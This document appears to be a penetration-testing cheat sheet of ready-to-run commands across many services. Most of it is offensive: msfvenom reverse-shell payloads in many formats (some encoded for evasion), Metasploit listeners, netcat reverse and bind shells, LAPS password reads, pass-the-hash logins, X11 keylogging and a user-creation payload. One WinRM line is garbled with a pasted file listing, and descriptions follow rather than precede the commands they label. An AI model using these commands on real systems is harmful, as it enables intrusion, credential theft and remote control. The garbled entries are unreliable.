- desc: ldapsearch - list all users protected by adminCount
- - cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(&(objectCategory=user)(|(description=*pass*)(description=*password*)(description=*identifiant*)(description=*pwd*)))'
- lang: sh
- tags: pentest
- desc: ldapsearch - list all users with password, pass, identifiant or pwd in their description
- - cmd: ldapsearch -x -H ldap://<dc_fqdn> -D <domain>\\<username> -w '<password>' -b 'DC=<domain>,DC=<path>' '(ms-Mcs-AdmPwdExpirationtime=*)' ms-Mcs-AdmPwd
- lang: sh
- tags: pentest
- desc: ldapsearch - list all computer with laps enabled and corresponding laps password if able
- - cmd: ldapdomaindump --no-json --no-grep --authtype SIMPLE -o ldap_dump -r <ip> -u <domain>\\<username> -p '<password>'
- lang: sh
- tags: pentest
- desc: ldapdomaindump
- - cmd: ldapsearch-ad.py --server '<dc_fqdn>' -d <domain> -u <username> -p <password> --type pass-pols
- lang: sh
- tags: pentest
- desc: ldapsearch-ad - list all password policies including FGPP
- - cmd: ldapsearch-ad.py --server '<dc_fqdn>' -d <domain> -u <username> -p <password> -t search -s '(samaccountname=<groupname>)' cn msDS-PSOApplied
- lang: sh
- tags: pentest
- desc: ldapsearch-ad - get the FGPP applied to a group
- - cmd: ldapsearch-ad.py --server '<dc_fqdn>' -d <domain> -u <username> -p <password> --type show-user -s '(samaccountname=<username>)'
- lang: sh
- tags: pentest
- desc: ldapsearch-ad - get the FGPP applied to a user
- - cmd: sqsh -S <ip> -U <user>
- lang: sh
- tags: pentest
- desc: '- connect'
- - cmd: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <ip>
- lang: sh
- tags: mssql, Microsoft SQL Server, 1433
- desc: mssql - enum
- - cmd: msfconsole -x "use admin/mssql/mssql_enum_sql_logins; set RHOSTS <ip>; set USER_FILE <user_file>; set PASS_FILE <pass_file>; run"
- lang: sh
- tags: mssql, Microsoft SQL Server, 1433
- desc: mssql - enum sql login
- - cmd: msfconsole -x "use auxiliary/admin/mssql/mssql_enum; set RHOST <ip>; set password <password>; run"
- lang: sh
- tags: mssql, Microsoft SQL Server, 1433
- desc: mssql - enum configuration setting (xp-cmdshell)
- - cmd: msfconsole -x "use exploit/windows/mssql/mssql_linkcrawler"
- lang: sh
- tags: mssql, Microsoft SQL Server, 1433
- desc: mssql link crawler
- - cmd: mysql -u <user> -p<password> -h <hostname> <database>
- lang: sh
- tags: mysql, database, db, 3306
- desc: connect
- - cmd: mysql -u <user> -p -e "create database <database> character set UTF8mb4 collate utf8mb4_bin"
- lang: sh
- tags: mysql, database, db, 3306
- desc: Create database
- - cmd: mysqldump -u <user> -p <database> > <path>
- lang: sh
- tags: mysql, database, db, 3306
- desc: Export database
- - cmd: mysql -u <user> -p <database> <path>
- lang: sh
- tags: mysql, database, db, 3306
- desc: Import database
- - cmd: nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <ip>
- lang: sh
- tags: mysql, database, db, 3306
- desc: nmap - mysql enumeration
- - cmd: nbtscan -r <ip_range>
- lang: sh
- tags: netbios, scan, nbtscan
- desc: nbtscan - netbios scan
- - cmd: showmount -e <ip>
- lang: sh
- tags: nfs, showmount, 2049
- desc: nfs showmount
- - cmd: nmap -sV --script=nfs-showmount <ip>
- lang: sh
- tags: nfs, showmount, 2049
- desc: nfs - nmap showmount
- - cmd: mount -t nfs <ip>:<shared_folder> <mount_point> -o nolock
- lang: sh
- tags: nfs, showmount, 2049
- desc: nfs - mount
- - cmd: mount -t nfs -o vers=2 <ip>:<shared_folder> <mount_point> -o nolock
- lang: sh
- tags: nfs, showmount, 2049
- desc: nfs - mount with v2 (no authenrt=)
- - cmd: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port <port> <ip>
- lang: sh
- tags: pop, pop3, 110, 995
- desc: nmap - pop3 infos
- - cmd: psql -h <host> -U <user>
- lang: sh
- tags: postgres, 5432, 5433
- desc: postgres - connect
- - cmd: psql -h <ip> -U <user> -d <database>
- lang: sh
- tags: postgres, 5432, 5433
- desc: postgres - connect database
- - cmd: psql -h <ip> -p <port> -U <user> -W <password> <database>
- lang: sh
- tags: postgres, 5432, 5433
- desc: postgres - connect full options
- - cmd: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- lang: sh
- tags: rdp, windows, 3389
- desc: enable RDP
- - cmd: New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
- lang: sh
- tags: rdp, windows, 3389
- desc: enable restricted admin
- - cmd: Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin
- lang: sh
- tags: rdp, windows, 3389
- desc: disable restricted admin
- - cmd: sharprdp.exe computername=<computer> command="<command>" username=<domain>\<user> password=<password>
- lang: sh
- tags: rdp, windows, 3389
- desc: rdp from console
- - cmd: netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp
- lang: sh
- tags: rdp, windows, 3389
- desc: Add firewall authorisation RDP
- - cmd: rdesktop -g 90% <ip> -u <user> -p <password> -d <domain>
- lang: sh
- tags: rdp, windows
- desc: rdesktop - classic
- - cmd: rdesktop -g 90% <ip> -u <user> -p <password> -d <domain> -r disk:share=<share>
- lang: sh
- tags: rdp, windows
- desc: rdesktop - with share
- - cmd: xfreerdp /u:<user> /p:<password> /d:<domain> /v:<ip> /size:1800x924
- lang: sh
- tags: rdp, windows
- desc: xfreerdp - classic
- - cmd: xfreerdp /u:<user> /p:<password> /d:<domain> /v:<ip> /size:1800x924 /drive:share,<share>
- lang: sh
- tags: rdp, windows
- desc: xfreerdp - with share
- - cmd: xfreerdp /u:<user> /pth:<hash> /d:<domain> /v:<ip>
- lang: sh
- tags: rdp, windows
- desc: xfreerdp - pass the hash
- - cmd: enum4linux -a <ip>
- lang: sh
- tags: smb, samba
- desc: enum4linux - all except dictionary based share name listing (default)
- - cmd: enum4linux -v <ip>
- lang: sh
- tags: smb, samba
- desc: enum4linux - verbose
- - cmd: enum4linux -u "" -p "" <ip>
- lang: sh
- tags: smb, samba
- desc: enum4linux - null access
- - cmd: enum4linux -u "guest" -p "" <ip>
- lang: sh
- tags: smb, samba
- desc: enum4linux - guest access
- - cmd: enum4linux -u <user> -p <password> <ip>
- lang: sh
- tags: smb, samba
- desc: enum4linux - with authentication
- - cmd: enum4linux -U <ip> |grep 'user:'
- lang: sh
- tags: smb, samba
- desc: enum4linux - list Users
- - cmd: nbtscan -r <ip_range>
- lang: sh
- tags: smb, samba
- desc: nbtscan - scan network looking for hosts
- - cmd: smbclient \\\\<ip>\\<share> -U "<user>%<password>"
- lang: sh
- tags: smb, samba
- desc: smbclient with username and password
- - cmd: smbclient \\\\<ip>\\<share> -U "<user>%"
- lang: sh
- tags: smb, samba
- desc: smbclient sessions without password
- - cmd: smbclient \\\\<ip>\\<share> -U "%"
- lang: sh
- tags: smb, samba
- desc: smbclient null session
- - cmd: nmap -Pn -sS -T4 --open --script smb-security-mode -p445 <ip>
- lang: sh
- tags: smb, samba
- desc: smb - find not signed smb
- - cmd: mount -t cifs //<ip>/C\$ /tmp/mnttarget/ -o username=<user> -o domain=<domain>
- lang: sh
- tags: smb, samba
- desc: smb mount folder
- - cmd: smbmap -H <ip> -u "<user>%<password>"
- lang: sh
- tags: smb, samba
- desc: smbmap
- - cmd: smbmap -u "" -p "" -P 445 -H <ip>
- lang: sh
- tags: smb, samba
- desc: smbmap - null access
- - cmd: smbmap -u "guest" -p "" -P 445 -H <ip>
- lang: sh
- tags: smb, samba
- desc: smbmap - guest access
- - cmd: smbmap -H <ip> -u <user> -p <password> -d <domain> -r
- lang: sh
- tags: smb, samba
- desc: smbmap - list root of all shares
- - cmd: smbmap -H <ip> -u <user> -p <password> -d <domain> -R <path> --depth 1
- lang: sh
- tags: smb, samba
- desc: smbmap - recursively list dirs, and files
- - cmd: nmap -p25 --script smtp-commands <ip>
- lang: sh
- tags: smtp, 25
- desc: smtp nmap enumeration
- - cmd: nmap -p25 --script smtp-ntlm-info <ip>
- lang: sh
- tags: smtp, 25
- desc: smtp nmap ntlm information disclosure
- - cmd: nmap –script smtp-enum-users.nse <ip>
- lang: sh
- tags: smtp, 25
- desc: nmap - smtp user enum
- - cmd: smtp-user-enum -M VRFY -U <userlist> -t <ip>
- lang: sh
- tags: smtp, 25
- desc: smtp user enum
- - cmd: msfconsole -x "use auxiliary/scanner/smtp/smtp_enum; set RHOSTS <ip>; exploit"
- lang: sh
- tags: smtp, 25
- desc: msf - smtp user enum
- - cmd: nmap -sU --open -p 161 -sC -sV <ip>
- lang: sh
- tags: snmp, 161
- desc: nmap, snmp scan
- - cmd: nmap -sU --open -p 161 --script=snmp-brute <ip> --script-args snmp-brute.communitiesdb=<snmp_community_strings_file>
- lang: sh
- tags: snmp, 161
- desc: nmap, snmp brute
- - cmd: echo public > community; echo private >> community; echo manager >> community; onesixtyone -c community -i ips; rm community
- lang: sh
- tags: snmp, 161
- desc: onesixtyone
- - cmd: snmpwalk -c public -v1 <ip>
- lang: sh
- tags: snmp, 161
- desc: snmpwalk entire tree
- - cmd: snmpwalk -c private -v1 <ip> 1.3.6.1.2.1.25.4.2.1.2
- lang: sh
- tags: snmp, 161
- desc: snmpwalk - list running processes
- - cmd: snmp-check -t <ip> -c public -p 162
- lang: sh
- tags: snmp, 161
- desc: snmp-check - check snmp service on specified port (default:162)
- - cmd: eval "$(ssh-agent -s)"; ssh-add
- lang: sh
- tags: ssh, 22
- desc: Start ssh agent
- - cmd: ssh -L <local_port>:<remote_host>:<remote_port> <user>@<ip>
- lang: sh
- tags: ssh, 22
- desc: SSH local port forwarding (get remote_port on local)
- - cmd: ssh -R <remote_binding>:<remote_port>:<local_host>:<local_port> <user>@<ip>
- lang: sh
- tags: ssh, 22
- desc: SSH remote port forwarding (send local port to remote) (need GatewayPorts yes)
- - cmd: ssh -D <socks_port> <user>@<ip>
- lang: sh
- tags: ssh, 22
- desc: SSH proxysocks
- - cmd: ssh-keyscan -t rsa <IP> -p <PORT>
- lang: sh
- tags: ssh, 22
- desc: get public ssh key of server
- - cmd: msfconsole -x "use scanner/ssh/ssh_enumusers; set RHOSTS <ip>; set USER_FILE <user_file>; set CHECK_FALSE true; exploit"
- lang: sh
- tags: ssh, 22
- desc: msf - bruteforce username
- - cmd: ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 <user>@<ip>
- lang: sh
- tags: ssh, 22
- desc: SSH - old algorithm
- - cmd: nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <ip>
- lang: sh
- tags: telnet, 23
- desc: nmap - telnet
- - cmd: nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p <port> <ip>
- lang: sh
- tags: vnc, 5800, 5801, 5900, 5901
- desc: vnc - nmap enum
- - cmd: vncviewer <ip>::<port>
- lang: sh
- tags: vnc, 5800, 5801, 5900, 5901
- desc: vncviewer - connect to vnc no pass
- - cmd: vncviewer -password <password.txt> <ip>::<port>
- lang: sh
- tags: vnc, 5800, 5801, 5900, 5901
- desc: vncviewer - connect to vnc with password
- - cmd: msfconsole -x "use auxiliary/scanner/vnc/vnc_none_auth; set RHOSTS <ip>; set RPORT <port>; run"
- lang: sh
- tags: vnc, 5800, 5801, 5900, 5901
- desc: vnc msf test none auth
- - cmd: msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS <ip>; set RPORT <port>; set USERNAME <username>; run"
- lang: sh
- tags: vnc, 5800, 5801, 5900, 5901
- desc: vnc - msf test login bf
- - cmd: msfconsole -x "use auxiliary/scanner/vnc/vnc_login; set RHOSTS <ip>; set RPORT <port>; set USER_FILE <users_file>; set PASS_FILE <pass_file>; run"
- lang: sh
- tags: vnc, 5800, 5801, 5900, 5901
- desc: vnc - msf test login bf (2)
- - cmd: msfconsole -x "use post/windows/gather/credentials/vnc; set SESSION <session>; run"
- lang: sh
- tags: vnc, 5800, 5801, 5900, 5901
- desc: vnc - post exploit retrieve credentials
- - cmd: Enable-PSRemoting -Force ; Set-Item wsman:\localhost\client\trustedhosts 7z 7z.md Android-Debug-Bridge-adb Android-Debug-Bridge-adb.md apktool apktool.md application-whitelisting application-whitelisting.md Arsenal Arsenal.md AWS AWS.md binwalk binwalk.md Bitadmins.md bloodhound bloodhound.md bof bof.md Brew Brew.md Builds-recreates-starts-and-attaches-to-containers-for-all-services.md Builds-recreates-starts-and-attaches-to-containers-for-a-service.md Builds-recreates-starts-and-detaches-to-containers-for-all-services.md Builds-recreates-starts-and-detaches-to-containers-for-a-service.md C certipy certipy.md certutil certutil.md cewl cewl.md chisel chisel.md C.md cme cme.md coercer coercer.md commands.yaml Compile-windows-PE-32 Compile-windows-PE-32.md connect-to-mysql-docker-container.md Crack-files Crack-files.md Create-a-new-bash-process-inside-the-container-and-connect-it-to-the-terminal.md Create-new-network.md Crontab Crontab.md crunch crunch.md cve-bin-tool cve-bin-tool.md Delete-all-running-and-stopped-containers.md Dirb Dirb.md DNS DNS.md Docker Docker.md dotnet-.net dotnet-.net.md drupwn drupwn.md enum4linux enum4linux.md eyewitness eyewitness.md feroxbuster feroxbuster.md ffuf ffuf.md flashrom flashrom.md FTP FTP.md git git.md gobuster gobuster.md gowitness gowitness.md gpg gpg.md grep grep-hash grep-hash.md grep.md gzip gzip.md hashcat hashcat.md Hydra Hydra.md impacket Impacket impacket.md Impacket.md Jadx Jadx.md Java.md john-the-ripper john-the-ripper.md json json.md JwtTool JwtTool.md kerberos kerberos.md keytool keytool.md kubernetes kubernetes.md LAPS LAPS.md Lazagne Lazagne.md ldap ldap.md linux linux-bash linux-bash.md linux.md List-the-networks.md List-the-running-containers.md Lsassy Lsassy.md mimikatz mimikatz.md mitm6 mitm6.md MSF MSF.md msfvenom msfvenom-create-user msfvenom-create-user.md msfvenom-Handler msfvenom-Handler.md msfvenom.md msfvenom-Shellcode msfvenom-Shellcode.md msssql msssql.md Mysql Mysql.md ncat ncat.md netbios netbios.md netcat netcat.md network network.md nfs nfs.md nikto nikto.md nmap nmap.md nodejs nodejs.md npm npm.md nvm nvm.md Objection Objection.md openssl openssl.md Others-grep Others-grep.md parse.sh php-grep php-grep.md pop pop.md Postgres Postgres.md powershell powershell.md powerview powerview.md Printerbug-and-Petitpotam Printerbug-and-Petitpotam.md Print-the-last-lines-of-a-containers-logs-and-following-its-logs.md Print-the-last-lines-of-a-containers-logs.md Print-the-last-lines-of-a-services-logs-and-following-its-logs.md Print-the-last-lines-of-a-services-logs.md procdump procdump.md QR-code QR-code.md race-condition race-condition.md rar rar.md rdesktop rdesktop.md Redis Redis.md responder responder.md reverse-shell reverse-shell.md rpcclient rpcclient.md rubeus rubeus.md run-mysql-container.md Scripting-Payloads Scripting-Payloads.md SCShell SCShell.md Searchsploit Searchsploit.md sed sed.md server server.md Service Service.md smb smbmap smbmap.md smb.md SMTP SMTP.md snmp snmp.md socat socat.md SQLMAP SQLMAP.md ssh ssh.md Stop-a-running-container-through-SIGKILL.md Stop-a-running-container-through-SIGTERM.md Stops-containers-and-removes-containers-networks-created-by-up.md systemctl systemctl.md tar tar.md telnet telnet.md Tomcat Tomcat.md unblob unblob.md veracrypt veracrypt.md VNC VNC.md WEB WEB.md web-shell web-shell.md wfuzz wfuzz.md wifi wifi.md windows windows.md windows-rdp windows-rdp.md winrm winrm.md WPSCAN WPSCAN.md X11 X11.md xfreerdp xfreerdp.md ysoserial ysoserial.md ysoserial.net ysoserial.net.md yum yum.md zip zip.md
- lang: ps1
- tags: windows, remote, winrm, evilwinrm, 5985, 5986
- desc: Enable winrm (powershell)
- - cmd: wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
- lang: sh
- tags: windows, remote, winrm, evilwinrm, 5985, 5986
- desc: Enable winrm (wmic)
- - cmd: Test-WSMan -computername <computername>
- lang: ps1
- tags: windows, remote, winrm, evilwinrm, 5985, 5986
- desc: Test target is configure to use winrm (powershell)
- - cmd: Invoke-Command -computername <computername> -ScriptBlock {<cmd>} -credential <domain>\<username>
- lang: ps1
- tags: windows, remote, winrm, evilwinrm, 5985, 5986
- desc: Execute a command on the target over winrm (powershell)
- - cmd: Invoke-Command -ComputerName <computername> -FilePath <path_to_script> -credential <domain>\<username>
- lang: ps1
- tags: windows, remote, winrm, evilwinrm, 5985, 5986
- desc: Execute a script on the target over winrm (powershell)
- - cmd: Enter-PSSession -ComputerName <computername> -Credential <domain>\<username>
- lang: ps1
- tags: windows, remote, winrm, evilwinrm, 5985, 5986
- desc: Get a powershell session with winrm (powershell)
- - cmd: .\PsExec.exe \\<computername> -u <domain>\<username> -p <password> -h -d powershell.exe "enable-psremoting -force"
- lang: sh
- tags: windows, remote, winrm, evilwinrm, 5985, 5986
- desc: Enable winrm remotelly from psexec
- - cmd: gem install evil-winrm
- lang: sh
- tags: windows, remote, winrm, evilwinrm, 5985, 5986
- desc: evil-winrm install
- - cmd: evil-winrm -i <ip>/<domain> -u <user> -p <password>
- lang: sh
- tags: windows, remote, winrm, evilwinrm, 5985, 5986
- desc: evil-winrm use
- - cmd: evil-winrm -i <ip>/<domain> -u <user> -H <hash>
- lang: sh
- tags: windows, remote, winrm, evilwinrm, 5985, 5986
- desc: evil-winrm use pass the hash
- - cmd: nmap -sV --script x11-access -p <port> <ip>
- lang: sh
- tags: pentest
- desc: '- check anonymous connection'
- - cmd: xdpyinfo -display <ip>:<display>
- lang: sh
- tags: x11, 6000
- desc: x11 - verify connection
- - cmd: xwininfo -root -tree -display <ip>:<display>
- lang: sh
- tags: x11, 6000
- desc: x11 - verify connection (2)
- - cmd: xwd –root –screen –silent –display <ip>:<display> > screenshot.xwd; convert screenshot.xwd screenshot.png
- lang: sh
- tags: x11, 6000
- desc: X11 - screenshot
- - cmd: xspy <ip>
- lang: sh
- tags: x11, 6000
- desc: X11 - keylogging
- - cmd: xrdp <ip>:<display>
- lang: sh
- tags: x11, 6000
- desc: X11 - remote desktop view
- - cmd: msfconsole -x "use exploit/unix/x11/x11_keyboard_exec; set RHOSTS <rhost>; set payload cmd/unix/reverse_bash; set lhost <lhost>; set lport <lport>; exploit"
- lang: sh
- tags: x11, 6000
- desc: X11 - msf reverse shell
- - cmd: msf-pattern_create -l <size>
- lang: sh
- tags: bof, buffer overflow
- desc: bof, pattern creation
- - cmd: msf-pattern_offset -l <size> -q <pattern>
- lang: sh
- tags: bof, buffer overflow
- desc: bof, pattern offset
- - cmd: msf-nasm_shell # nasm > jmp esp
- lang: sh
- tags: bof, buffer overflow
- desc: bof, nasm - show opcode from asm
- - cmd: ROPgadget --binary <binary>
- lang: sh
- tags: bof, buffer overflow
- desc: ropgadget - Specify a binary filename to analyze
- - cmd: ROPgadget --binary <binary> --ropchain
- lang: sh
- tags: bof, buffer overflow
- desc: ropgagdet - Enable the ROP chain generation
- - cmd: ROPgadget --binary <binary> --opcode <opcode>
- lang: sh
- tags: bof, buffer overflow
- desc: ropgagdet - Search opcode in executable segment
- - cmd: ROPgadget --binary <binary> --string <string> --range <start_address>-<end_address>; ROPgadget --binary <binary> --only="<instructions>"; ROPgadget --binary <binary> --filter="<instructions>"
- lang: sh
- tags: bof, buffer overflow
- desc: ropgadget - Search string between two addresses (0x...-0x...)
- - cmd: !mona modules
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Show all loaded modules and their properties
- - cmd: !mona config -set workingfolder <path|c:\logs\%p>
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Configure the log directory (no need to create it)
- - cmd: !mona config -get workingfolder
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Verify the current the log directory
- - cmd: !mona pc <pattern_size|400>
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Create a cyclic pattern of a given size
- - cmd: !mona findmsp
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Find cyclic pattern in memory
- - cmd: !mona po <pattern_value|41346541>
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Find location (offset) of 4 bytes in a cyclic pattern
- - cmd: !mona find -s <pattern_value|"w00tw00t">
- lang: sh
- tags: bof, buffer overflow
- desc: 'mona - Find bytes in memory (ex: eggs)'
- - cmd: !mona jmp -r <reg_name|esp> -n
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Find pointers that will allow you to jump to a register (without null bytes)
- - cmd: !mona getiat -s <function_name|*strcpy*>
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Find a function in IAT
- - cmd: !mona sehchain
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Show the current SEH chain
- - cmd: !mona bpseh
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Set a breakpoint on all current SEH Handler function pointers
- - cmd: !mona seh
- lang: sh
- tags: bof, buffer overflow
- desc: 'mona - Find pointers to assist with SEH overwrite exploits (default: no aslr, no rebase, no safeseh)'
- - cmd: !mona bytearray -cpb <excluded_bytes|'\x00\x0a\x0d'>
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Badchar hunting step 1 - Creates a byte array
- - cmd: !mona compare -f <input_file|C:\BadChars\bytearray.bin> -a <bytesarray_address|esp>
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Badchar hunting step 3 - compare until "!!! Hooray, normal shellcode unmodified !!!" message
- - cmd: !mona rop -cm aslr=false,rebase=false
- lang: sh
- tags: bof, buffer overflow
- desc: 'mona - Finds gadgets that can be used in a ROP exploit and do ROP magic with them (Note : can take 20 minutes)'
- - cmd: !mona stackpivot -cm os=true -distance <min,max|12,12>
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Finds stackpivots (move stackpointer to controlled area)
- - cmd: !mona find -type file -s <input_file|C:\stackpivot.txt> -p2p
- lang: sh
- tags: bof, buffer overflow
- desc: mona - Show pointers to pointers to the pattern (might take a while !)
- - cmd: msfvenom --list payloads
- lang: sh
- tags: msfvenom, reverse shell
- desc: msfvenom payloads list
- - cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local_ip> LPORT=<local_port> -f exe > shell.exe
- lang: sh
- tags: msfvenom, reverse shell
- desc: msfvenom - payload windows x86 meterpeter unstagged
- - cmd: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell.elf
- lang: sh
- tags: msfvenom, reverse shell
- desc: Linux Meterpreter Reverse Shell
- - cmd: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip|tun0> LPORT=<port> prependfork=true -f elf -t 300 -e x64/xor_dynamic -o test.elf
- lang: sh
- tags: msfvenom, reverse shell
- desc: Linux x64 Meterpreter Reverse tcp
- - cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe
- lang: sh
- tags: msfvenom, reverse shell
- desc: Windows Meterpreter Reverse TCP Shell
- - cmd: msfvenom -p windows/shell/reverse_tcp LHOST=<ip> LPORT=<local> -f exe > shell.exe
- lang: sh
- tags: msfvenom, reverse shell
- desc: Windows Reverse TCP Shell
- - cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<local> -e shikata_ga_nai -i 3 -f exe > encoded.exe
- lang: sh
- tags: msfvenom, reverse shell
- desc: Windows Encoded Meterpreter Windows Reverse Shell
- - cmd: msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f macho > shell.macho
- lang: sh
- tags: msfvenom, reverse shell
- desc: Mac Reverse Shell
- - cmd: msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<ip> LPORT=<port|443> -f exe -o /var/www/html/msfnonstaged.exe
- lang: sh
- tags: msfvenom, reverse shell
- desc: meterpreter x64 - https - non staged
- - cmd: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> -f exe -o /var/www/html/msfstaged.exe
- lang: sh
- tags: msfvenom, reverse shell
- desc: meterpreter x64 - https - staged
- - cmd: msfvenom -p php/meterpreter_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.php
- lang: sh
- tags: msfvenom, reverse shell
- desc: Web Payloads
- - cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f asp > shell.asp
- lang: sh
- tags: msfvenom, reverse shell
- desc: ASP Meterpreter Reverse TCP
- - cmd: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw > shell.jsp
- lang: sh
- tags: msfvenom, reverse shell
- desc: JSP Java Meterpreter Reverse TCP
- - cmd: msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war > shell.war
- lang: sh
- tags: msfvenom, reverse shell
- desc: WAR
- - cmd: msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> EXITFUNC=thread -f vbapplication
- lang: sh
- tags: msfvenom, reverse shell
- desc: VBA 32bits
- - cmd: msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> EXITFUNC=thread -f ps1
- lang: sh
- tags: msfvenom, reverse shell
- desc: powershell 32 bits
- - cmd: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> -f dll -o <dll|output.dll>
- lang: sh
- tags: msfvenom, reverse shell
- desc: DLL
- - cmd: msfvenom -p cmd/unix/reverse_python LHOST=<ip> LPORT=<port> -f raw > shell.py
- lang: sh
- tags: pentest
- desc: Python Reverse Shell
- - cmd: msfvenom -p cmd/unix/reverse_bash LHOST=<ip> LPORT=<port> -f raw > shell.sh
- lang: sh
- tags: pentest
- desc: Bash Unix Reverse Shell
- - cmd: msfvenom -p cmd/unix/reverse_perl LHOST=<ip> LPORT=<port> -f raw > shell.pl
- lang: sh
- tags: pentest
- desc: Perl Unix Reverse shell
- - cmd: msfvenom -p windows/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> EXITFUNC=thread -f ps1
- lang: sh
- tags: pentest
- desc: Powershell
- - cmd: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=<port|443> --encrypt xor --encrypt-key <key> -f csharp
- lang: sh
- tags: pentest
- desc: Csharp - xor encrypted
- - cmd: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f <language>
- lang: sh
- tags: pentest
- desc: Windows Meterpreter Reverse TCP Shellcode
- - cmd: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f <language>
- lang: sh
- tags: pentest
- desc: Linux Meterpreter Reverse TCP Shellcode
- - cmd: msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f <language>
- lang: sh
- tags: pentest
- desc: Mac Reverse TCP Shellcode
- - cmd: msfvenom -p windows/adduser USER=<user|hacker> PASS='<pass|Hacker123$>' -f exe > adduser.exe
- lang: sh
- tags: pentest
- desc: MCreate User
- - cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port>; set payload windows/meterpreter/reverse_tcp; exploit"
- lang: sh
- tags: pentest
- desc: Metasploit Handler windows tcp 32bits staged
- - cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/meterpreter/reverse_https; set EXITFUNC thread; exploit"
- lang: sh
- tags: pentest
- desc: Metasploit Handler windows https 32bits staged
- - cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/x64/meterpreter/reverse_https; exploit"
- lang: sh
- tags: pentest
- desc: Metasploit Handler windows https 64bits staged
- - cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/x64/meterpreter_reverse_https; exploit"
- lang: sh
- tags: pentest
- desc: Metasploit - Handler windows https 64bits unstaged
- - cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip>; set lport <port|443>; set payload windows/x64/meterpreter/reverse_https; set EXITFUNC thread; set EnableStageEncoding true; set StageEncoder <encoder|x64/xor_dynamic>; exploit"
- lang: sh
- tags: pentest
- desc: Metasploit - Handler windows https 64bits stagged - encoded xor
- - cmd: msfconsole -x "use exploits/multi/handler; set lhost <ip|tun0>; set lport <lport|443>; set payload windows/x64/meterpreter/reverse_https; set EXITFUNC thread; set EnableStageEncoding true; set StageEncoder x64/xor_dynamic; exploit"
- lang: sh
- tags: pentest
- desc: Metasploit - Handler linux tcp 64bits stagged - encoded xor
- - cmd: nc -nlvp <lport>
- lang: sh
- tags: nc, netcat
- desc: nc setup listener
- - cmd: nc -nlvp <port> -e cmd.exe
- lang: sh
- tags: nc, netcat
- desc: nc bind shell windows
- - cmd: nc -nlvp <port> -e /bin/bash
- lang: sh
- tags: nc, netcat
- desc: nc bind shell linux
- - cmd: nc -nv <ip> <port> -e cmd.exe
- lang: sh
- tags: nc, netcat
- desc: nc reverse shell windows
- - cmd: nc -nv <ip> <port> -e /bin/bash
- lang: sh
- tags: nc, netcat
- desc: nc reverse shell linux
- - cmd: nc -nlvp <port> > <incomming_file>
- lang: sh
- tags: nc, netcat
- desc: nc transfer file - receiver
- - cmd: nc -nv <ip> <port> < <file_to_send>
- lang: sh
- tags: nc, netcat
- desc: nc transfer file - sender
